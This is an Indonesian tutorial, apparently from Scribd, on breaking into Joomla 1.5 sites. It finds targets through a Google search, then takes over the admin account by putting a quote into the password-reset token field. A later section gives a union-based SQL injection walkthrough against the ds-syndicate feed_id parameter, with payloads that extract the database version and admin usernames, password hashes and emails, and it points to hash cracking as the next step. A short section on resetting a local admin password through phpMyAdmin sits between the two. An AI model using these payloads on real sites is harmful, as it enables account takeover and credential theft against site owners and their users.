0% menganggap dokumen ini bermanfaat (0 suara)
184 tayangan5 halaman

Joomla Hack

Dokumen tersebut memberikan panduan cara untuk mengeksploitasi situs berbasis Joomla 1.5 melalui SQL injection pada komponen ds-syndicate. Langkahnya meliputi mencari bug pada variabel feed_id, menggunakan fungsi order by dan union untuk mengambil data dari database, serta mendapatkan informasi admin seperti username dan hash password.

Diunggah oleh

msbbrebes
Hak Cipta
© Attribution Non-Commercial (BY-NC)
Kami menangani hak cipta konten dengan serius. Jika Anda merasa konten ini milik Anda, ajukan klaim di sini.
Format Tersedia
Unduh sebagai DOC, PDF, TXT atau baca online di Scribd
0% menganggap dokumen ini bermanfaat (0 suara)
184 tayangan5 halaman

Joomla Hack

Dokumen tersebut memberikan panduan cara untuk mengeksploitasi situs berbasis Joomla 1.5 melalui SQL injection pada komponen ds-syndicate. Langkahnya meliputi mencari bug pada variabel feed_id, menggunakan fungsi order by dan union untuk mengambil data dari database, serta mendapatkan informasi admin seperti username dan hash password.

Diunggah oleh

msbbrebes
Hak Cipta
© Attribution Non-Commercial (BY-NC)
Kami menangani hak cipta konten dengan serius. Jika Anda merasa konten ini milik Anda, ajukan klaim di sini.
Format Tersedia
Unduh sebagai DOC, PDF, TXT atau baca online di Scribd
Anda di halaman 1/ 5

Berikut ini cara-cara membobol situs berbasis Joomla 1.5.

1. Buka alamat target yang menggunakan Joomla 1.5. Anda bisa menemukan di Google dengan
mengetikkan “by Joomla 1.5? di kolom pencrian. Sebab, secara default, kalimat ini ada dalam
setiap footer situs berbasis Joomla 1.5.
2. Tambahkan baris di bawah ini setelah alamat target.
index.php?option=com_user&view=reset&layout=confirm
Menjadi:
target.com/index.php?option=com_user&view=reset&layout=confirm
2. Tuliskan pada kolom “token” karakter(tanda)  ‘ dan klik OK.
3. Isi password baru untuk admin.
4. Buka halaman target.com/administrator/.
5. Login admin dengan password baru.
6. Lakukan yang Anda suka secara bertanggung jawab.

Cara ini terjadi karena kesalahan coding pada file /components/com_user/models/reset.php


dan /components/com_user/models/controller.php.

NB:Posting ini hanya untuk pengetahuan. Segala bentuk penyalahgunaaan adalah tanggung
jawab masing-masing .Dan bukittinggihackers tidak bertanggung jawab pada sesuatu hal yg di
salah gunakan oleh orang-orang yg tidak bertanggung jawab dan kami menyarankan supaya anda
meng -update Joomla anda ke versi yg terbaru

Mereset password joomla

Administrator juga manusia, kadang sang admin pun bisa lupa password untuk login sebagai
Administrator websitenya. Anda pun mungkin akan mengalami sedikit masalah jika Anda web
yang Anda kelola tersebut masih berada di localhost dan Anda tidak terhubung ke internet,
karena fasilitas “Forgot Password” akan mengirim password baru Anda ke email Anda.

Kali ini saya akan coba kasih langkah-langkah untuk mereset password Administrator atau pun
user di Joomla jika Anda tidak terhubung ke internet dan web Anda masih di localhost. Langkah-
Langkah Mereset Password

1. Liat tabel users Joomla di phpMyadmin


2. Kemudian edit dan ganti password admin/user sesuai dengan yang loe mau, jangan lupa
password baru yang akan loe masukin itu harus udah di MD5 dulu. Kalo ga ngerti apa itu MD5,
ganti aja passwordnya dengan “226776f356d7ecf58b60bab12a05d38f” (tanpa kutip).

Kemudian coba masuk ke /administrator dan login sebagai administrator Joomla, masukkan user
id yang tadi loe rubah passwordnya, kemudian di kolom password ketikkan “joomla” (tanpa
kutip).Dan Selamat Mengutak atik joomla anda

SQL Injection pada Joomla (hack Joomla)


Apa jadinya jika admin malas mengupdate webnya? Apa jadinya jika admin tidak
memperhatikan security risk yang ada? Apa jadinya jika ‘the choosen one’ ternyata seorang
admin yang tidak tahu sama sekali mengenai system keamanan sebuah data? Ironi memang.
Bahkan terkadang ada admin yang meremehkan system keamanan. Apa jadinya jika server anda
memiliki konfigurasi default? Apa jadinya, apa jadinya? Dan segudang akibat dari hasil
penggabungan dua kata tersebut. Yang terjadi adalah peluang seorang attacker untuk menyusup
ke dalam website anda semakin memungkinkan, mengobrak-abrik server anda, bahkan tidak
jarang seorang attacker mengambil profit dari exploitasi system yang ada. Dalam berbagai hal,
termasuk mendulang dollar dengan cara tidak halal. Seperti yang dilakukan oleh para carder.

Penulis akan menjelaskan betapa mudahnya sebuah web dieksploitasi hanya dengan
bermodalkan internet dan browser internet tentunya, dan sedikit pengetahuan sql query. Perlu
penulis jelaskan, penulis hanyalah seorang manusia biasa yang memiliki pengetahuan minimal
dari sistem keamanan data.

Ya, belum lama ini, salah satu component joomla terbukti mengidap penyakit berbahaya, tumor
ganas yang akan menjalar keseluruh tubuh, dan berakibat kematian pada akhirnya. ~~

Telah ditemukan bug sql injection pada com_ds-syndicate, ini adalah salah satu contoh dari
sekian banyak bug fatal yang terdapat dalam joomla. Waspadalah! Kesalahan terjadi karena
komponen ini tidak menyediakan filtering sql yang ketat dalam variable feed_id. Penyusupan
dapat dilakukan, sederhananya ini terjadi karena kesalahan dari variable feed_id. Dan saat
menulis artikel ini ada beberapa site masih memiliki kecacatan seperti ini.

Ya, Langsung aja …

http:// korban.com/index2.php?option=ds-syndicate&version=1&feed_id=1

Url ini menampilkan feeds seperti biasanya, tapi beda halnya jika kita tes kelemahannya, dengan
penambahan tanda kutip ( ‘ ) di belakangnya.

http:// korban.com/index2.php?option=ds-syndicate&version=1&feed_id=1′

Apa yang terjadi ? … error…

Langkah selanjutnya adalah cari urutan si table ‘dssyndicate_feeds’ dengan mendapatkan bentuk
error yang sama, dan berhenti ketika mendapatkan error yang berbeda :

index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+1/* –> errornya sama


index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+2/* –> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+3/* –> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+4/* –> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+20/* –> errornya sama

index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+21/* –> errornya berbeda
perhatikan bentuk error-nya berbeda ketika feed_id yang diisi dengan 1+order+by+21/*, ini
adalah patokan untuk melakukan injeksi sql yang selanjutnya.

Langkah selanjutnya adalah penggunaan union, lebih jelasnya mengenai fungsi union, silahkan
baca di sini.

Selanjutnya kita test, apakah fungsi union dapat berjalan pada url korban.
index2.php?option=ds-
syndicate&version=1&feed_id=1+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,
15,16,17,18,19,20+from+wc_users

lihat paling akhir dari baris tersebut,


from+wc_users

wc_users adalah nama table yang diambil dari struktur database joomla. Berisi mengenai
informasi login user.
Sedangkan 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ini diperoleh berdasarkan yang
telah penulis jelaskan sebelumnya.

Ya setelah url di atas di enter, yang perlu dilakukan adalah mendownload file tersebut,

Setelah itu buka file yang baru didownload tersebut dengan editor seperti notepad, walaupun
filenya xml, tapi penulis tetap menyarankan untuk membukanya dengan notepad, tidak dengan
browser internet, karena memudahkan untuk pembacaan hasil dari sql injection yang telah
dilakukan.

Lihat angka 2 di dalam tag

Jangan pedulikan angka (18) di belakangnya, yang perlu diperhatikan adalah angka 2-nya. Ini
berarti berdasarkan hasil query union menggunakan browser tadi, anda dapat menggunakan
angka 2 tersebut untuk keperluan selanjutnya. Seperti mengganti angka 2 dengan kumpulan
karakter lain untuk menggunakannya seperti melihat versi mysql yang digunakan, ya langsung
saja, kita akan mencobanya untuk melihat versi mysql yang digunakan oleh si korban. Gunakan
url ini …

http://korban.com/hack/joomla/index2.php?option=ds-
syndicate&version=1&feed_id=1+union+all+select+1,

@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from
+wc_users

perhatikan angka 2 diganti dengan kalimat @@version, enter, kemudian buka kembali file telah
di download dengan notepad, apa yang terjadi ? title berubah menjadi versi si mysql, yang
penulis dapatkan :
Mysql versi 5.0.33 , sampai sini anda telah dapat eksplorasi database user dengan leluasa. Apa
yang dilakukan seorang attacker selanjutnya ? ya, mendapatkan username dan password si
admin. .

Pengambilan username dan password secara paksa menggunakan sql injection ini dapat
dilakukan secara satu persatu, ataupun sekaligus. Query untuk menampilkan username
menggunakan bug sql injection yang satu ini, anda cukup mengganti @@version yang tadi
dengan field yang menyimpan informasi username tentunya, gunakan url ini :

http://korban.com/hack/joomla/index2.php?option=ds-
syndicate&version=1&feed_id=1+union+all+select+1,

username,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+wc_users

jalankan url, download filenya, kemudian buka kembali dengan notepad. Hasilnya adalah
username dari database tersebut …

Atau bisa juga ditampilkan informasi username, password, email, dan user_type sekaligus,
gunakan url seperti ini :

http://korban.com/hack/joomla/index2.php?option=ds-
syndicate&version=1&feed_id=1+union+all+select+1,

concat(username,0x3a,password,0x3a,email,0x3a,usertype),3,
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+wc_users

perhatikan, string username, diganti dengan


concat(username,0x3a,password,0x3a,email,0x3a,usertype), penggunaan concat disini adalah
mengconvert suatu hexa, ataupun spesial karakter kedalam bentuk ascii, sehingga, yang terjadi
nantinya adalah :

0x3a berubah menjadi titik dua ( : ), buka kembali file hasil dari url di atas. Yang penulis
dapatkan adalah informasi seperti ini :

admin:bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK: [email protected]
e-mail address is being protected from spambots, you need JavaScript enabled to view it :Super
Administrator

Jika di urutkan :
Username : admin
Password ( hash ) : bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK
Email : [email protected] e-mail address is being protected from spambots, you need
JavaScript enabled to view it
User type : Super Administrator
Yang di lakukan selanjutnya adalah mencoba crack password, karena itu masih dalam bentuk
hash, dengan kata lain password yang masih terenkripsi. . Yups, pengambilan username dan
password secara paksa telah terjadi, si attacker kembali mencari cara bagaimana mendapatkan
password yang asli, dengan cara mengcrack password hash tersebut.

Inilah bukti begitu mudahnya suatu web diambil alih oleh attacker, akibat dari seorang admin
yang malas melakukan patch pada systemnya.

Anda mungkin juga menyukai